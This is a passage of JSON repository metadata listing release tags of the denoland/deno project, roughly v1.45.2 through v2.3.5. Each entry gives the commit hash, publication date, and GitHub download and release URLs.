epositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denola